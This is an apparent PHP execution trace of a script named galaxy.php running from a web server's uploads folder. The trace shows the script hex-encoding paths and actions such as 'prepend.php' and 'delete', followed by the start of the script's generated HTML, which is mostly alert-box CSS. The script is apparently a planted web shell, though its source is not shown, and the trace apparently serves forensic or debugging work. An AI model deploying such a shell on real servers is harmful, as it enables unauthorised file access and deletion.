3	1808	0	0.062710	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1808	1	0.062721	485248
3	1808	R			108
3	1809	0	0.062733	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1809	1	0.062745	485280
3	1809	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1810	0	0.062774	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1810	1	0.062785	485248
3	1810	R			47
3	1811	0	0.062802	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1811	1	0.062817	485280
3	1811	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1812	0	0.062847	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1812	1	0.062858	485248
3	1812	R			117
3	1813	0	0.062871	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1813	1	0.062882	485280
3	1813	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1814	0	0.062912	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1814	1	0.062923	485248
3	1814	R			112
3	1815	0	0.062936	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1815	1	0.062947	485280
3	1815	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1816	0	0.062976	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1816	1	0.062988	485256
3	1816	R			108
3	1817	0	0.063000	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1817	1	0.063011	485288
3	1817	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1818	0	0.063040	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1818	1	0.063052	485256
3	1818	R			111
3	1819	0	0.063063	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1819	1	0.063075	485288
3	1819	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1820	0	0.063103	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1820	1	0.063114	485256
3	1820	R			97
3	1821	0	0.063127	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1821	1	0.063138	485288
3	1821	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1822	0	0.063167	485216	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1822	1	0.063179	485256
3	1822	R			100
3	1823	0	0.063191	485216	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1823	1	0.063203	485288
3	1823	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1824	0	0.063232	485232	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1824	1	0.063243	485272
3	1824	R			115
3	1825	0	0.063256	485232	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1825	1	0.063267	485304
3	1825	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1783	1	0.063296	485232
2	1783	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1826	0	0.063312	485280	hex	1		/var/www/html/uploads/galaxy.php	117	1	'prepend.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1827	0	0.063343	485280	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1827	1	0.063354	485320
3	1827	R			112
3	1828	0	0.063367	485280	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1828	1	0.063378	485352
3	1828	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1829	0	0.063408	485312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1829	1	0.063419	485352
3	1829	R			114
3	1830	0	0.063430	485312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1830	1	0.063442	485384
3	1830	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1831	0	0.063471	485312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1831	1	0.063483	485352
3	1831	R			101
3	1832	0	0.063495	485312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1832	1	0.063506	485384
3	1832	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1833	0	0.063539	485312	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1833	1	0.063551	485352
3	1833	R			112
3	1834	0	0.063563	485312	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1834	1	0.063575	485384
3	1834	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1835	0	0.063604	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1835	1	0.063615	485360
3	1835	R			101
3	1836	0	0.063627	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1836	1	0.063639	485392
3	1836	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1837	0	0.063668	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1837	1	0.063680	485360
3	1837	R			110
3	1838	0	0.063692	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1838	1	0.063703	485392
3	1838	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1839	0	0.063733	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1839	1	0.063744	485360
3	1839	R			100
3	1840	0	0.063756	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1840	1	0.063768	485392
3	1840	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1841	0	0.063797	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1841	1	0.063808	485360
3	1841	R			46
3	1842	0	0.063820	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1842	1	0.063831	485392
3	1842	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1843	0	0.063861	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1843	1	0.063872	485368
3	1843	R			112
3	1844	0	0.063884	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1844	1	0.063896	485400
3	1844	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1845	0	0.063924	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1845	1	0.063936	485368
3	1845	R			104
3	1846	0	0.063948	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1846	1	0.063959	485400
3	1846	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1847	0	0.063988	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1847	1	0.063999	485368
3	1847	R			112
3	1848	0	0.064011	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1848	1	0.064022	485400
3	1848	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1826	1	0.064051	485328
2	1826	R			'70726570656e642e706870'
2	1849	0	0.064066	485408	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1850	0	0.064097	485408	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1850	1	0.064112	485448
3	1850	R			47
3	1851	0	0.064129	485408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1851	1	0.064141	485480
3	1851	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1852	0	0.064172	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1852	1	0.064184	485480
3	1852	R			118
3	1853	0	0.064196	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1853	1	0.064207	485512
3	1853	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1854	0	0.064241	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1854	1	0.064252	485480
3	1854	R			97
3	1855	0	0.064265	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1855	1	0.064276	485512
3	1855	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1856	0	0.064306	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1856	1	0.064318	485480
3	1856	R			114
3	1857	0	0.064330	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1857	1	0.064342	485512
3	1857	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1858	0	0.064371	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1858	1	0.064382	485488
3	1858	R			47
3	1859	0	0.064395	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1859	1	0.064406	485520
3	1859	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1860	0	0.064436	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1860	1	0.064447	485488
3	1860	R			119
3	1861	0	0.064459	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1861	1	0.064470	485520
3	1861	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1862	0	0.064499	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1862	1	0.064510	485488
3	1862	R			119
3	1863	0	0.064522	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1863	1	0.064534	485520
3	1863	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1864	0	0.064563	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1864	1	0.064574	485488
3	1864	R			119
3	1865	0	0.064586	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1865	1	0.064597	485520
3	1865	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1866	0	0.064626	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1866	1	0.064637	485496
3	1866	R			47
3	1867	0	0.064649	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1867	1	0.064661	485528
3	1867	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1868	0	0.064690	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1868	1	0.064701	485496
3	1868	R			104
3	1869	0	0.064714	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1869	1	0.064725	485528
3	1869	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1870	0	0.064754	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1870	1	0.064766	485496
3	1870	R			116
3	1871	0	0.064778	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1871	1	0.064789	485528
3	1871	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1872	0	0.064819	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1872	1	0.064831	485496
3	1872	R			109
3	1873	0	0.064843	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1873	1	0.064854	485528
3	1873	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1874	0	0.064887	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1874	1	0.064898	485504
3	1874	R			108
3	1875	0	0.064911	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1875	1	0.064957	485536
3	1875	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1876	0	0.064994	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1876	1	0.065006	485504
3	1876	R			47
3	1877	0	0.065019	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1877	1	0.065030	485536
3	1877	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1878	0	0.065059	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1878	1	0.065071	485504
3	1878	R			117
3	1879	0	0.065083	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1879	1	0.065094	485536
3	1879	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1880	0	0.065124	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1880	1	0.065135	485504
3	1880	R			112
3	1881	0	0.065146	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1881	1	0.065158	485536
3	1881	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1882	0	0.065187	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1882	1	0.065198	485512
3	1882	R			108
3	1883	0	0.065210	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1883	1	0.065222	485544
3	1883	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1884	0	0.065251	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1884	1	0.065263	485512
3	1884	R			111
3	1885	0	0.065275	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1885	1	0.065286	485544
3	1885	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1886	0	0.065314	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1886	1	0.065326	485512
3	1886	R			97
3	1887	0	0.065338	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1887	1	0.065349	485544
3	1887	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1888	0	0.065378	485472	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1888	1	0.065390	485512
3	1888	R			100
3	1889	0	0.065402	485472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1889	1	0.065413	485544
3	1889	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1890	0	0.065442	485488	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1890	1	0.065453	485528
3	1890	R			115
3	1891	0	0.065466	485488	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1891	1	0.065477	485560
3	1891	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1849	1	0.065506	485488
2	1849	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1892	0	0.065522	485408	hex	1		/var/www/html/uploads/galaxy.php	117	1	'delete'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1893	0	0.065553	485408	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1893	1	0.065565	485448
3	1893	R			100
3	1894	0	0.065577	485408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1894	1	0.065588	485480
3	1894	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1895	0	0.065618	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1895	1	0.065630	485480
3	1895	R			101
3	1896	0	0.065642	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1896	1	0.065653	485512
3	1896	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1897	0	0.065685	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1897	1	0.065697	485480
3	1897	R			108
3	1898	0	0.065709	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1898	1	0.065721	485512
3	1898	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1899	0	0.065750	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1899	1	0.065762	485480
3	1899	R			101
3	1900	0	0.065774	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1900	1	0.065786	485512
3	1900	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1901	0	0.065815	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1901	1	0.065826	485488
3	1901	R			116
3	1902	0	0.065838	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1902	1	0.065850	485520
3	1902	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1903	0	0.065879	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1903	1	0.065891	485488
3	1903	R			101
3	1904	0	0.065903	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1904	1	0.065914	485520
3	1904	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1892	1	0.065943	485448
2	1892	R			'64656c657465'
2	1905	0	0.065957	485408	hex	1		/var/www/html/uploads/galaxy.php	117	1	'prepend.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1906	0	0.065988	485408	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1906	1	0.066000	485448
3	1906	R			112
3	1907	0	0.066012	485408	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1907	1	0.066024	485480
3	1907	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1908	0	0.066053	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1908	1	0.066064	485480
3	1908	R			114
3	1909	0	0.066077	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1909	1	0.066088	485512
3	1909	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1910	0	0.066118	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1910	1	0.066130	485480
3	1910	R			101
3	1911	0	0.066142	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1911	1	0.066154	485512
3	1911	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1912	0	0.066183	485440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1912	1	0.066194	485480
3	1912	R			112
3	1913	0	0.066206	485440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1913	1	0.066217	485512
3	1913	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1914	0	0.066247	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1914	1	0.066259	485488
3	1914	R			101
3	1915	0	0.066271	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1915	1	0.066282	485520
3	1915	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1916	0	0.066311	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1916	1	0.066322	485488
3	1916	R			110
3	1917	0	0.066335	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1917	1	0.066346	485520
3	1917	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1918	0	0.066375	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1918	1	0.066386	485488
3	1918	R			100
3	1919	0	0.066402	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1919	1	0.066413	485520
3	1919	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1920	0	0.066442	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1920	1	0.066453	485488
3	1920	R			46
3	1921	0	0.066466	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1921	1	0.066477	485520
3	1921	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1922	0	0.066507	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1922	1	0.066518	485496
3	1922	R			112
3	1923	0	0.066530	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1923	1	0.066542	485528
3	1923	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1924	0	0.066570	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1924	1	0.066582	485496
3	1924	R			104
3	1925	0	0.066594	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1925	1	0.066605	485528
3	1925	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1926	0	0.066634	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1926	1	0.066645	485496
3	1926	R			112
3	1927	0	0.066658	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1927	1	0.066669	485528
3	1927	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1905	1	0.066698	485456
2	1905	R			'70726570656e642e706870'
1	3	1	0.066716	484384
			0.066761	336416
TRACE END   [2023-02-12 21:58:21.545618]


Generated HTML code

<html lang="en"><head><style type="text/css">.swal-icon--error{border-color:#f27474;-webkit-animation:animateErrorIcon .5s;animation:animateErrorIcon .5s}.swal-icon--error__x-mark{position:relative;display:block;-webkit-animation:animateXMark .5s;animation:animateXMark .5s}.swal-icon--error__line{position:absolute;height:5px;width:47px;background-color:#f27474;display:block;top:37px;border-radius:2px}.swal-icon--error__line--left{-webkit-transform:rotate(45deg);transform:rotate(45deg);left:17px}.swal-icon--error__line--right{-webkit-transform:rotate(-45deg);transform:rotate(-45deg);right:16px}@-webkit-keyframes animateErrorIcon{0%{-webkit-transform:rotateX(100deg);transform:rotateX(100deg);opacity:0}to{-webkit-transform:rotateX(0deg);transform:rotateX(0deg);opacity:1}}@keyframes animateErrorIcon{0%{-webkit-transform:rotateX(100deg);transform:rotateX(100deg);opacity:0}to{-webkit-transform:rotateX(0deg);transform:rotateX(0deg);opacity:1}}@-webkit-keyframes animateXMark{0%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}50%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}80%{-webkit-transform:scale(1.15);transform:scale(1.15);margin-top:-6px}to{-webkit-transform:scale(1);transform:scale(1);margin-top:0;opacity:1}}@keyframes animateXMark{0%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}50%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}80%{-webkit-transform:scale(1.15);transform:scale(1.15);margin-top:-6px}to{-webkit-transform:scale(1);transform:scale(1);margin-top:0;opacity:1}}.swal-icon--warning{border-color:#f8bb86;-webkit-animation:pulseWarning .75s infinite alternate;animation:pulseWarning .75s infinite alternate}.swal-icon--warning__body{width:5px;height:47px;top:10px;border-radius:2px;margin-left:-2px}.swal-icon--warning__body,.swal-icon--warning__dot{position:absolute;left:50%;background-color:#f8bb86}.swal-icon--warning__dot{width:7px;height:7px;border-radius:50%;margin-left:-4px;bottom:-11px}@-webkit-keyframes pulseWarning{0%{border-color:#f8d486}to{border-color:#f8bb86}}@keyframes pulseWarning{0%{border-color:#f8d486}to{border-color:#f8bb86}}.swal-icon--success{border-color:#a5dc86}.swal-icon--success:after,.swal-icon--success:before{content:"";border-radius:50%;position:absolute;width:60px;height:120px;background:#fff;-webkit-transform:rotate(45deg);transform:rotate(45deg)}.swal-icon--success:before{border-radius:120px 0 0 120px;top:-7px;left:-33px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transform-origin:60px 60px;transform-origin:60px 60px}.swal-icon--success:after{border-radius:0 120px 120px 0;top:-11px;left:30px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transform-origin:0 60px;transform-origin:0 60px;-webkit-animation:rotatePlaceholder 4.25s ease-in;animation:rotatePlaceholder 4.25s ease-in}.swal-icon--success__ring{width:80px;height:80px;border:4px solid hsla(98,55%,69%,.2);border-radius:50%;box-sizing:content-box;position:absolute;left:-4px;top:-4px;z-index:2}.swal-icon--success__hide-corners{width:5px;height:90px;background-color:#fff;padding:1px;position:absolute;left:28px;top:8px;z-index:1;-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}.swal-icon--success__line{height:5px;background-color:#a5dc86;display:block;border-radius:2px;position:absolute;z-index:2}.swal-icon--success__line--tip{width:25px;left:14px;top:46px;-webkit-transform:rotate(45deg);transform:rotate(45deg);-webkit-animation:animateSuccessTip .75s;animation:animateSuccessTip .75s}.swal-icon--success__line--long{width:47px;right:8px;top:38px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-animation:animateSuccessLong .75s;animation:animateSuccessLong .75s}@-webkit-keyframes rotatePlaceholder{0%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}5%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}12%{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}to{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}}@keyframes rotatePlaceholder{0%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}5%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}12%{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}to{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}}@-webkit-keyframes animateSuccessTip{0%{width:0;left:1px;top:19px}54%{width:0;left:1px;top:19px}70%{width:50px;left:-8px;top:37px}84%{width:17px;left:21px;top:48px}to{width:25px;left:14px;top:45px}}@keyframes animateSuccessTip{0%{width:0;left:1px;top:19px}54%{width:0;left:1px;top:19px}70%{width:50px;left:-8px;top:37px}84%{width:17px;left:21px;top:48px}to{width:25px;left:14px;top:45px}}@-webkit-keyframes animateSuccessLong{0%{width:0;right:46px;top:54px}65%{width:0;right:46px;top:54px}84%{width:55px;right:0;top:35px}to{width:47px;right:8px;top:38px}}@keyframes 